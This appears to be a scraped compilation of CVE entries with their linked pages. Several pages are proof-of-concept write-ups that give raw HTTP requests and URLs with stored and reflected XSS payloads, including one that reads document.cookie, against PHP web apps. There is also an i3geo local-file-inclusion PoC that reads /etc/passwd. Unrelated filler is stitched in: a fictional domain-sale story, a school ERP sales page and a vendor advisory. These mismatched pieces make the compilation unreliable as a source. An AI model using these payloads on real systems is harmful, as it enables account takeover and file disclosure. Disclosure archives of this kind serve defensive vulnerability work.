Cross site scripting (XSS) in gollum 5.0 to 5.1.2 via the filename parameter to the 'New Page' dialog.

**You have arrived**

Congratulations! You are now the proud owner of GOLLUM.COM. As the news spread amongst your partners, employees, and customers, your mobile is ringing for three days. You've got a huge number of calls, a mailbox full of messages and congrats. Everything is looking good but you need a bit of time, to process it all, to see the numbers.

It has now been six months and the numbers are in! 40% increase in direct traffic, then shortly after the number is 70%. Repeat customers have grown well over 200%. Who would have thought? Increased trust, word of mouth, no traffic leaks, an important immunity against another brand who may grab the domain, better SEO and more effective marketing campaigns. You didn't even realize you were missing on all of those before.

It's been a year now. You sit back and reflect, you've spent three months and a small fortune to acquire GOLLUM.COM, and looking back you conclude, it was the best investment you have ever made.

I hope you enjoyed the journey. While the story is fictional, it is based on real people and real events, all of which are listed below.

CVE-2020-35305: GOLLUM.COM may be available for sale or other proposals

Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Restaurant Name field to /dashboard/profile.php.

**Exploit Title: Multi Restaurant Table Reservation System - Multiple Persistent XSS****Date: 01-11-2020****Exploit Author: yunaranyancat****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip****Version: 1.0****Tested on: Ubuntu 18.04 + XAMPP 7.4.11**

Summary:

Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities.

**1.CVE-2020-35261**

Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field

**Sample request POC #1**

    POST /TableReservation/dashboard/profile.php HTTP/1.1
    Host: [TARGET URL/IP]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 122
    Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save
    

**2.CVE-2020-36550**

Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php

**Sample request POC #2**

    POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
    Host: [TARGET URL/IP]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php
    Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622
    Content-Length: 321
    Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------424640138424818065256966622
    Content-Disposition: form-data; name="tablename"
    
    <script>alert("XSS")</script>
    -----------------------------424640138424818065256966622
    Content-Disposition: form-data; name="addtable"
    
    Add Table
    -----------------------------424640138424818065256966622--
    

**3.CVE-2020-36551**

Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php

**4.CVE-2020-36552**

Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php

**5.CVE-2020-36553**

Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food\_type) dropdown to XSS payload in menu-add.php

**Sample request POC #3, #4 & #5**

    POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
    Host: [TARGET URL/IP]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php
    Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499
    Content-Length: 6641
    Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="itemname"
    
    <script>alert("XSS1")</script>
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="price"
    
    1
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="madeby"
    
    <svg onload=alert("XSS2")>
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="food_type"
    
    <svg onload=prompt("XSS4")>
    -----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="image"; filename="image.jpeg"
    Content-Type: image/jpeg
    
    ..
    [REDACTED CONTENT OF image.jpeg]
    ..
    
    ----------------------------165343425917898292661480081499
    Content-Disposition: form-data; name="addItem"
    
    Add Item
    -----------------------------165343425917898292661480081499--

CVE-2020-35261: poc-dump/MultiRestaurantReservationSystem/1.0 at main · yunaranyancat/poc-dump

Honeywell Alerton Ascent Control Module (ACM) through 2022-05-04 allows unauthenticated programming writes from remote users. This enables code to be store on the controller and then run without verification. A user with malicious intent can send a crafted packet to change and/or stop the program without the knowledge of other users, altering the controller's function. After the programming change, the program needs to be overwritten in order for the controller to restore its original operational function.

CVE-2022-30244: Product Security

Arox School ERP Pro v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the dispatchcategory parameter in backoffice.inc.php.

**About School ERP**

School ERP is a web based school management system that enables school to use and operate many of integrated interrelated modules and manages the administration of school efficiently. Due to its ever growing and competitive nature, the education sector has always been in need of a quality solution to manage and serve the school resources efficiently. It sector is giving number of solutions to schools like smart classroom, digital learning solutions and school management system to make learning easier and manage school administration effectively. Today educational institution is not limited to imparting education alone, but it is adapting latest trends in it for improving the quality of education and handling various activities of school including admissions, class management, library management, logistics, inventory, fee management, certificate, accounts etc. We offer School ERP which simplifies and automates schools administration process. The school management system is accurate and reliable and can be conveniently accessed from school internet as well as from the public internet. It is fully browser based school management system which also includes virtual campus which can be linked with school portal and contains powerful online access to bring parents, teachers and students on a common interactive platform. Yet another advantage of the ERP system is that it runs on minimal hardware and easily fits in the budget of schools. In ERP users have role based access rights which tightly models existing schools hierarchy. School ERP is totally customizable according to the needs of school.

**Features of School ERP:**

*   Fees Management
*   Attendance Management
*   Certificate/ Notice Creation and Printing
*   Examination & Results
*   Class & Time Table Management
*   Transportation Management
*   Financial Accounts Management

*   Purchase and Store Management
*   Accounting Management
*   Event Management
*   Front Office Management
*   Human Resource Management
*   Employee Management.(Leave, Tax, Pay Slip, Deduction)
*   Notification Management

*   Hostel Management
*   ID Card Printing
*   Security Management- Visitors. Record, Report
*   Notice Board
*   Library Management
*   Videos
*   Photo Gallery

**Projects**

**You'll get two projects(both pro and responsive versions) with Source Code****Technology: PHP/mySQL**

*   Check first two versions demo(Pro and Responsive version demo), You'll get both projects at a nominal cost here.

*   **Pricing:**
*   Indians: Rs.15499/- Rs.1999/-
*   Non-Indians: USD 249/- USD 39/-

*   **Buy Now:**
*   Indian Customers click here
*   Non-Indian Customers click here

**FAQs**

Will I get editable/non-encrypted source code on purchase of any of above product?

Yes, you'll get complete source code on purchase of any product. You can easily edit/customize it with help of a PHP Developer.

What technologies are used in School ERP Pro and School ERP Responsive?

PHP with mySQL database is used.

What is the difference between School ERP Pro, School ERP Responsive and Pro+Responsive Combo?

The basic difference between School ERP Pro and School ERP Responsive is their User Interface Design. School ERP Pro comes with table based design. And School ERP Responsive comes with latest Bootstrap based design which is device friendly layout.  
And Pro+Responsive Combo is not a third project. In this package you get two projects:- School ERP Pro and School ERP Responsive

If I want to upgrade Pro version to Responsive version, Should I pay remaining amount between School ERP Pro and School ERP Responsive?

No, You'll have to pay the amount between Pro+Responsive Combo and Your previously purchased product.

**© 2021. All rights reserved**

CVE-2022-32118: School Management System with Source Code

In affected versions of Octopus Server the help sidebar can be customized to include a Cross-Site Scripting payload in the support link.

Summary

Stored Cross-Site Scripting (XSS) in Octopus Server help sidebar (CVE-2022-29890)

Advisory Number

2022-07

Discovery Date

19 May 2022

Patch Release Date

14 Jun 2022

Advisory Release Date

15 Jul 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-29890

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6729 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy security levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Server the help sidebar can be customized to include a Cross-Site Scripting payload in the support link.

The versions of Octopus Server affected by this vulnerability are:

*   All 2019.7.x, 2019.8.x, 2019.9.x, 2019.10.x, 2019.11.x, 2019.12.x, 2019.13.x versions
*   All 2020.x.x versions
*   All 2021.x.x versions before 2021.3.13021
*   All 2022.1.x versions before 2022.1.2849
*   All 2022.2.x versions before 2022.2.6729
*   All 2022.3.x versions before 2022.3.2387

As of the 15/07/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2021.3.13021
*   2022.1.2849
*   2022.2.6729
*   2022.3.2387

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6729). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6729):**

If you have feature version...

...then upgrade to this version

2019.7.x, 2019.8.x, 2019.9.x, 2019.10.x, 2019.11.x, 2019.12.x, 2019.13.x, 2020.x.x

2021.3.13021 or greater

2021.x.x

2021.3.13021 or greater

2022.1.x

2022.1.2849 or greater

2022.2.x

2022.2.6729 or greater

2022.3.x

2022.3.2387 or greater

**Mitigation**

There is no known mitigation for CVE-2022-29890, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team (https://octopus.com/support).

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-29890: Security Advisory 2022-07

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.

Boa tarde

A vulnerabilidade em questão está no arquivo request\_token.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

http://.../i3geo/pacotes/linkedinoauth/example/request\_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--  
Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34094: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - request_token.php · Issue #5 · edmarmoretti/i3geo

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.

Boa tarde

A vulnerabilidade em questão está no arquivo access\_token.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

*   http://.../i3geo/pacotes/linkedinoauth/example/access\_token.php=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34093: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - access_token.php · Issue #4 · saladesituacao/i3geo

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via svg2img.php.

Boa tarde

A vulnerabilidade em questão está no arquivo svg2img.php.

O nível de severidade da vulnerabilidade é alta, pois é possível a injeção de código html, bem como a execução de código javascript.

Proof of Concept (POC)

O falha pode ser testada da seguinte maneira:

*   http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

Desde já agradeço a atenção.

Wagner Drachinski  
wagner.dracha@gmail.com

CVE-2022-34092: Vulnerabilidade - XSS (Cross Site Scripting) or HTML Injection - svg2img.php · Issue #3 · saladesituacao/i3geo

A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request.

Permalink

Cannot retrieve contributors at this time

####################################

\# LFI - Local File Inclusion #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a LFI (Local File Inclusion) in codemirror.php file. The file is located in the "exemplos" folder (/i3geo/exemplos/).

To exploit vulnerability:

\- http://.../i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd

\- http://.../i3geo/exemplos/codemirror.php?&pagina=data://text/plain;base64,SEFDS0VE

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in svg2img.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in access\_token.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/linkedinoauth/example/access\_token.php?=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in request\_token.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/linkedinoauth/example/request\_token.php?=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

CVE-2022-32409: ProofOfConcept/i3geo_proof_of_concept.txt at main · wagnerdracha/ProofOfConcept

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

Tag

#xss